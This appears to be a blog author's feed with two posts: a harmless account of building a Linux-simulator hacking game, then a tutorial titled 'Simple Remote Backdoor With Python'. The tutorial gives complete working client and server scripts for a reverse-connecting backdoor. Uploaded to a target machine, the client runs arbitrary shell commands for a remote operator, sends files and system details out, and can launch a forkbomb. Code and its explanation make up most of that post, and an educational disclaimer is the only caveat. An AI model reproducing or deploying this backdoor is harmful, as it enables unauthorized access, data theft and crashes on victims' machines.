DEV Community: Steve

How a Stupid Video Game Idea Helped Me Learn About the Inner Workings of Linux

Steve — Tue, 13 Apr 2021 00:15:18 +0000

I've been recently playing a game called Grey Hack on steam. It's a game about hacking that is pretty realistic. It contains real-world Linux commands (such as ls, cd, etc.) and a semi-realistic Linux-like filesystem (/etc, /bin, /var). It even has its own scripting/programming language so you can write your own exploits. But this isn't an advertisement for Grey Hack (even though I would recommend playing it); this is about where my idea came from. I've also been playing some other (less realistic) hacking games such as NITE Team 4 and Hacknet. As I played these games, I was very entertained by the Hollywood mentality of "it just works" with all the hacking mechanics; just typing hack and an IP address to gain access to a machine. I fantasized about a hyper-realistic hacking game, the Arma III of hacking games, if you will. I dug through the big game platforms (Steam, Epic, GOG, etc. ) to find even something close to my ideas, but I found nothing. Grey Hack is the closest to what I was imagining, but it still isn't all I imagined. After a few days of wishing my "dream" game existed, I had a genius idea why don't I just make it myself? I am a software engineer, after all!

First "Test" Try (November 2019 - March 2020 / Python)

I wrote the first line of code for the first version of the project in November 2019. This code is not public because it's outright embarrassing (really crappy code, lol), but it was a start, a way for me to plan out my ideas. The initial version started out well. There was a pretty good imitation of the Linux file system and a big chunk of the GNU Coreutils had replicas, but the code was starting to look like Italian cuisine: spaghetti. It wasn't planned out well, and as I added new stuff, I had to re-arrange my entire code base to get my new changes to work. On top of these limitations, I was missing significant features that were on my wish list. One of these major features was the ability to write and compile my own binaries to run on the virtual "system." But to implement this feature, I knew I had one of two options: implement my own C/C++-like programming language to interact with the game OR re-write the game in c/c++, and I bet you can guess which option I went with...

Second "Test" Try (January 2021 - Late January 2021 / C++)

I decided to re-write the game in C++ regardless of my lack of knowledge (compared to python). I decided to go with C++ because it was the language, I wanted my game to run (since most of Linux is written in C/C++). I decided I would do this by giving the game users a "dumbed down" version of the gcc/g++ compiler. I had the idea of replacing the standard Linux LibC with my own custom version that interfaces with the game world instead of the host computer. The only issue is that I have never even created a shared library before, so I needed to learn. After a few weeks of researching libraries, shared libraries, other various topics (running c without LibC, etc. ), I started re-creating what I had running in python. However, shortly after starting, I hit a major roadblock. I can't even express this because I'm not sure the proper terminology for this issue, but I'll try to explain it. I was writing a function to retrieve an item in the "filesystem" from a given computer. In python, I had a function that worked like this: result = file_system.find_file("/var/log/auth.log"). It would return a class object that represented the /var/log/auth.log file (which logs all authorization-related requests: sudo logins, ssh logins, etc.). In python, I could modify this class object (write to it, changing permissions, etc.) , and these changes could be observed in the file system. After trying to write this function in C++, I had a significant issue. My function would return the class object, but changes I make to it wouldn't affect the game's filesystem. I couldn't figure out why this was until I made a discovery that completely halted my progress. After printing the memory address of the instance returned by the find_file function, I noticed that it was different from the instance in the filesystem. This means that my function was returning a copy of the object instead of a reference to the original. No matter what I tried, I could not get this working the way I wanted. At this point, I gave into my lack of C/C++ knowledge and took a break from the project.

Third (Current) Try (March 2021 - Current / Python)

In early March 2021, I got inspired and decided to re-start the project, but I wanted to have a finished product this time. I started by re-reading my old tries and noting down the good parts and the bad parts. I planned out how my program would be organized and got to work. For the first week, I submitted at least one commit per day and was making major progress. Within the span of 10 days, I had more functionality than what I initially started with in my first demo. Not only did all my original concepts work as good, if not better than the originals, I also had many other features, such as a proper database for tracking users, groups, etc, documentation in the form of docstrings, and much more. However, at this point in the project, I ran into another major issue: I didn't know enough about how Linux operated to create a faithful recreation. This is where the main topic of this article comes into play: my deep dive into the world of Linux. I figured to be able to create an accurate representation of Linux, I needed to learn more than just the basics. At this point, I've been using Linux (Arch specifically) as my primary operating system for almost 2 years, and I've been managing Linux-based servers at work and at home for 4-5 years, but even this knowledge wasn't enough.

My First Research Topic: Man-pages

When I first started writing the current version, I quickly realized I needed someone (besides myself) to test my code, preferably someone with limited Linux knowledge. After only a little while of my friend playing around with the system, I realized I would need some instructions. I recognized that Linux's man-pages would do well here. But, here's where my first Linux-knowledge-related issue started: what even are man-pages? Where are they? Are they written by hand or automatically generated? You get the idea. I knew what a man-page was and how to use them, but that's about it. This first challenge actually introduced me to a new method of learning: community discord servers. After a short, in-depth discussion with some lovely members of a programming discord server, I was convinced that I learned enough about man-pages to be able to add a semi-realistic implementation to my game.

Learning More About Linux

As I continued work on the project, I ran into more instances where I didn't have sufficient knowledge to implement a specific feature. Whenever this happened, I took my time to research the given topic in-depth to learn how it works behind the scenes. I'm not going to discuss EVERY topic I researched and learned about along the way (because there is A LOT of them), but I will list a few of them here:

Man-pages
Logging (What's logged, where it's logged, and when)
How Linux treats files/directories in its file system
How apt package repos work
How Linux handles file permissions
How Linux handles the difference between system binaries, user binaries, and other misc binaries
Many more topics

I wanted my re-creations of components of a Linux system to be as faithful to the real world as possible, which is why I was required to learn, in a more in-depth way, how a Linux system works.

The Future

In its current stage, this "game" probably couldn't be considered a game. It might be regarded as a "simulator" at best. However, I have plans to make the "game" more like a game. There are still many features that Linux has that my game doesn't, which I plan to implement in the near future. Another major thing that makes my "game" seem less like a game is the fact that it is CLI only; there is no "desktop environment"/GUI yet. I want to add more features and make sure they work well before starting a UI for the game. I plan on writing some graphics with PyGame (which I actually have a small demo for), but my lack of knowledge might make this difficult.

The Project

I don't even think I mentioned the name of the project yet. The project is called blackhat-simulator! It is hosted on GitHub and is open to pull requests from anyone interested. Please feel free to read through my code, criticize my implementations, open an issue, or submit a pull request if you're interested in my project. I would love to hear your opinion on my project!

Thanks for reading!

Simple Remote Backdoor With Python

Steve — Wed, 07 Aug 2019 20:36:26 +0000

Note: Before you start reading this tutorial: DO NOT USE THIS CODE FOR MALICIOUS PURPOSES. THIS IS TUTORIAL IS ONLY FOR EDUCATIONAL PURPOSES!

Part 1: What is a backdoor?

According to Wikipedia:

A backdoor is a method, often secret, of bypassing normal authentication or encryption in a computer system, a product, or an embedded device (e.g. a home router), or its embodiment

In simpler terms, a backdoor is a piece of software installed on a machine that gives someone remote access to a computer, usually without proper permission. For example, a hacker might use a backdoor to maintain remote access on a compromised machine. A hacker might disguise a backdoor inside a seemingly regular looking game or program. Once the user of the target machine runs the program, the backdoor hidden in the software will allow the hacker to remotely connect to the target machine, usually through a command line. Through that remote connection, the hacker can execute commands, edit and read files, and more.

Part 2: How to Build a Custom Backdoor (Client)

This backdoor is going to be made up of two short scripts. The first script we're going to build is the client script. This is the script that will be uploaded to the compromised machine.

Script

import socket
import subprocess
import os
import platform
import getpass
import colorama
from colorama import Fore, Style
from time import sleep

colorama.init()

RHOST = "127.0.0.1"
RPORT = 2222

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((RHOST, RPORT))

while True:
    try:
        header = f"""{Fore.RED}{getpass.getuser()}@{platform.node()}{Style.RESET_ALL}:{Fore.LIGHTBLUE_EX}{os.getcwd()}{Style.RESET_ALL}$ """
        sock.send(header.encode())
        STDOUT, STDERR = None, None
        cmd = sock.recv(1024).decode("utf-8")

        # List files in the dir
        if cmd == "list":
            sock.send(str(os.listdir(".")).encode())

        # Forkbomb
        if cmd == "forkbomb":
            while True:
                os.fork()

        # Change directory
        elif cmd.split(" ")[0] == "cd":
            os.chdir(cmd.split(" ")[1])
            sock.send("Changed directory to {}".format(os.getcwd()).encode())

        # Get system info
        elif cmd == "sysinfo":
            sysinfo = f"""
Operating System: {platform.system()}
Computer Name: {platform.node()}
Username: {getpass.getuser()}
Release Version: {platform.release()}
Processor Architecture: {platform.processor()}
            """
            sock.send(sysinfo.encode())

        # Download files
        elif cmd.split(" ")[0] == "download":
            with open(cmd.split(" ")[1], "rb") as f:
                file_data = f.read(1024)
                while file_data:
                    print("Sending", file_data)
                    sock.send(file_data)
                    file_data = f.read(1024)
                sleep(2)
                sock.send(b"DONE")
            print("Finished sending data")

        # Terminate the connection
        elif cmd == "exit":
            sock.send(b"exit")
            break

        # Run any other command
        else:
            comm = subprocess.Popen(str(cmd), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            STDOUT, STDERR = comm.communicate()
            if not STDOUT:
                sock.send(STDERR)
            else:
                sock.send(STDOUT)

        # If the connection terminates
        if not cmd:
            print("Connection dropped")
            break
    except Exception as e:
        sock.send("An error has occured: {}".format(str(e)).encode())
sock.close()

Explanation

colorama.init()

RHOST = "127.0.0.1"
RPORT = 2222

These first few lines are for initializing some starter values. colorama.init() needs to be called for colorama (color text in terminal). The RHOST and RPORT variables are for connecting to the host machine. These vars need to be changed before uploading to the target machine.

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((RHOST, RPORT))

These next few lines are standard procedure for connecting to an IPV4 address through a TCP port.

while True:
    try:
        header = f"""{Fore.RED}{getpass.getuser()}@{platform.node()}{Style.RESET_ALL}:{Fore.LIGHTBLUE_EX}{os.getcwd()}{Style.RESET_ALL}$ """
        sock.send(header.encode())
        STDOUT, STDERR = None, None
        cmd = sock.recv(1024).decode("utf-8")

The entirety of the code for receiving commands, command execution, and sending data is wrapped in a while loop, so it goes on forever. The try-except is so if any commands execute improperly, the program continues instead of breaking the connection. The header var defines the prefix before tying a command. For example: hacked@linux-machine:/usr/hacked/Desktop$ The next line sends the header to the server, so the user knows what directory they're in and what user they're logged into. STDOUT and STDERR need to be set to None so commands don't double execute if the server sends empty data. The final line receives the command from the server to execute.

Commands:

List files

if cmd == "list":
    sock.send(str(os.listdir(".")).encode())

This command is used instead of ls because sometimes, ls is inconsistent

Forkbomb

if cmd == "forkbomb":
    while True:
        os.fork()

A forkbomb is an attack when a process replicates itself over and over again, causing all system resources to be consumed, usually causing the system to crash. The while loop infinitely duplicates the python process infinitely, causing the computer to crash.

elif cmd.split(" ")[0] == "cd":
    os.chdir(cmd.split(" ")[1])
    sock.send("Changed directory to {}".format(os.getcwd()).encode())

This command works better than the cd that is built into bash. This is because when the directory is changed in Linux, the python working directory isn't affected. This command uses os.chdir() to change the working directory in python and in Linux. Splitting the command allows for the argument (in this case, the directory to change to) to be processed separately

sysinfo

        elif cmd == "sysinfo":
            sysinfo = f"""
Operating System: {platform.system()}
Computer Name: {platform.node()}
Username: {getpass.getuser()}
Release Version: {platform.release()}
Processor Architecture: {platform.processor()}
            """
            sock.send(sysinfo.encode())

The sysinfo command uses a combination of the platform module and the getpass module to get information about the system such as: the operating system, the hostname of the machine, the current user, the current os version, and processor architecture. This text is nicely formatted and sent to the host server.

Download

elif cmd.split(" ")[0] == "download":
    with open(cmd.split(" ")[1], "rb") as f:
        file_data = f.read(1024)
        while file_data:
            print("Sending", file_data)
            sock.send(file_data)
            file_data = f.read(1024)
        sleep(2)
        sock.send(b"DONE")
    print("Finished sending data")

The download command is a little more complicated. Once again, the command is split to extract the argument. This time, instead of sending the data from the file all at once, the file must be split into 1024 byte (1KB) because the server can only receive 1 kilobyte at a time. Once the file is done sending, the client sends "DONE" (in bytes) to the server to let the server know that the file transfer is complete.

Exit

elif cmd == "exit":
    sock.send(b"exit")
    break

When calling exit, the text "exit" (in bytes) is sent to the server. This notifies the server to terminate the connection. Break exits the while True loop, terminating the program.

Any other command

else:
    comm = subprocess.Popen(str(cmd), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    STDOUT, STDERR = comm.communicate()
    if not STDOUT:
        sock.send(STDERR)
    else:
        sock.send(STDOUT)

If the command that was entered isn't a known internal command, it is executed through the system instead. The subprocess module is used to execute the command through the system's shell. The output is returned to two variables, STDOUT and STDERR. STDOUT is the standard system output. STDERR is the standard error output. The next if statement checks if the output went to STDOUT or STDERR. It sends the appropriate data once it has been checked.

        if not cmd:
            print("Connection dropped")
            break
    except Exception as e:
        sock.send("An error has occured: {}".format(str(e)).encode())
sock.close()

Finally, if no command is received, the program can assume that there was an error in the connection and will terminate the loop. Since the entire code is wrapped in a try-except, the program will send the exception to the server. Once the loop terminates, the socket will close.

Part 3: How to Build a Custom Backdoor (Server)

The second script is the server script. This script gets executed on the attacker's machine. This is the script that the clients will connect to, send a shell too, and the attacker will send commands through.

Script

import socket
import colorama

colorama.init()

LHOST = "127.0.0.1"
LPORT = 2222

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LHOST, LPORT))
sock.listen(1)
print("Listening on port", LPORT)
client, addr = sock.accept()

while True:
    input_header = client.recv(1024)
    command = input(input_header.decode()).encode()

    if command.decode("utf-8").split(" ")[0] == "download":
        file_name = command.decode("utf-8").split(" ")[1][::-1]
        client.send(command)
        with open(file_name, "wb") as f:
            read_data = client.recv(1024)
            while read_data:
                f.write(read_data)
                read_data = client.recv(1024)
                if read_data == b"DONE":
                    break

    if command is b"":
        print("Please enter a command")
    else:
        client.send(command)
        data = client.recv(1024).decode("utf-8")
        if data == "exit":
            print("Terminating connection", addr[0])
            break
        print(data)
client.close()
sock.close()

Explanation

colorama.init()

LHOST = "127.0.0.1"
LPORT = 2222

These first few lines are for initialization. The LHOST is the IP which the server will be hosted on. The LPORT is the port where the server will be hosted.

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LHOST, LPORT))
sock.listen(1)
print("Listening on port", LPORT)
client, addr = sock.accept()

Lines 9-13 are for initializing the server. Once again, socket.AF_INET is to start a server on an IPV4 address and socket.SOCK_STREAM is to run the server on a TCP port. sock.bind((LHOST, LPORT)) starts a server on the given IP and port. sock.listen(1) tells the program to only accept one incoming connection. The client is an object that allows the program to interact with the connected client, for example, send data. The addr is a tuple that contains the IP and port of the connected client.

while True:
    input_header = client.recv(1024)
    command = input(input_header.decode()).encode()

Just like the client, the entire code is wrapped in a while True: loop so that the commands can constantly send and executed, until the loop breaks. The input_header is the text before the input. Example: hacked@linux-machine:/usr/hacked/Desktop$. This data is received from the client and is entered as an argument to the input function. The user is asked to enter a command, it is encoded into bytes and saved into the command variable.

    if command.decode("utf-8").split(" ")[0] == "download":
        file_name = command.decode("utf-8").split(" ")[1][::-1]
        client.send(command)
        with open(file_name, "wb") as f:
            read_data = client.recv(1024)
            while read_data:
                f.write(read_data)
                read_data = client.recv(1024)
                if read_data == b"DONE":
                    break
        print("Finished reading data")

There is only one pre-defined command built into the server; download. When download is executed, it opens a new file with the name of the file to be downloaded. Next, the function reads 1KB at a time and writes that data to the file. If the server receives the data "DONE" (in bytes), the loop for receiving data stops.

    if command is b"":
        print("Please enter a command")

If no command is entered, the user is reminded that data must be entered.

    else:
        client.send(command)
        data = client.recv(1024).decode("utf-8")
        if data == "exit":
            print("Terminating connection", addr[0])
            break
        print(data)

If none of the other conditions are met, the script sends the command to the client to be executed. The data variable receives the output from the command (sent by the client). If the data that is received is "exit", the server terminates the connection and breaks the loop, which exits the script. Once the loop breaks, the connection to the client and the server socket is closed.

Part 4: Conclusion

Remember, entering any computer without permission is illegal. This script was made because I am interested in how these types of technologies work. Do not use this program for any illegal reasons. This program is also a very simple backdoor and is not 100% stable or complete.

Sources:

Cover image: The Daily Dot

Backdoor definition: Wikipedia